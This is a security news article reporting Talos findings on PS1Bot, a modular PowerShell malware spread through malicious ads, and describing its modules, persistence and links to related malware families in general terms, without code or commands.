Malicious Advertising Strategy Deploys Modular PowerShell Malware Known as PS1Bot

In the ever-evolving landscape of cyber threats, a new malware named PS1Bot has recently emerged, causing concern among security researchers. The ongoing campaign, which was first detected in 2025, shares similarities with the AHK Bot malware family.

According to Talos, the security research division of Cisco Systems, PS1Bot is a sophisticated malware that, once executed, retrieves a PowerShell script from a command-and-control (C2) server. This script polls the server for further modules, which are then executed in memory, reducing forensic traces.

The malware's infection chain begins with the downloading of a compressed archive from a malicious advertisement or SEO poisoning link. Each module in PS1Bot reports status updates to the attacker via HTTP requests.

Researchers have identified distinct modules performing various malicious activities. These include antivirus detection evasion, screen capture, cryptocurrency wallet and browser data theft, keylogging and clipboard monitoring, system information gathering, and persistence. The persistence in PS1Bot is achieved by creating PowerShell scripts and shortcuts that reinitiate the C2 loop on system startup.

One of the key features of PS1Bot is its keylogger. It uses Windows API hooks to capture keystrokes, mouse events, and clipboard contents. The screen capture tool generates JPEG screenshots at runtime, encodes them, and sends them to the C2 server.

Interestingly, Talos has not observed the Skitnet binary directly in the context of the PS1Bot campaign. However, there are overlaps in infrastructure, module design, and URL construction between PS1Bot and campaigns distributing Skitnet/Bossnet. The identified sources of PS1Bot malware potentially linked to the spread of Skitnet/Bossnet include compromised websites hosting malicious scripts, phishing campaigns, and infected software distribution channels.

The malware's flexible framework and active development indicate that PS1Bot will continue evolving as attackers adapt its capabilities. Talos has assessed that additional, undiscovered PS1Bot modules likely exist, adding to the concern about this new threat.

Moreover, the malware uses malvertising for distribution, adding another layer of complexity to its detection and prevention. The "grabber" module in PS1Bot targets dozens of web browsers and cryptocurrency wallet extensions, searching for files containing wallet seed phrases or passwords.

The architectural similarities between PS1Bot and AHK Bot, including the use of drive serial numbers to build C2 paths and a modular design enabling rapid updates, further underscore the sophistication of this malware.

As the cyber threat landscape continues to evolve, it is crucial for individuals and organisations to remain vigilant and take necessary measures to protect themselves against such threats. This includes keeping software updated, using reliable security solutions, and being cautious when clicking on advertisements or opening email attachments from unknown sources.

Malicious Advertising Strategy Deploys Modular PowerShell Malware Known as PS1Bot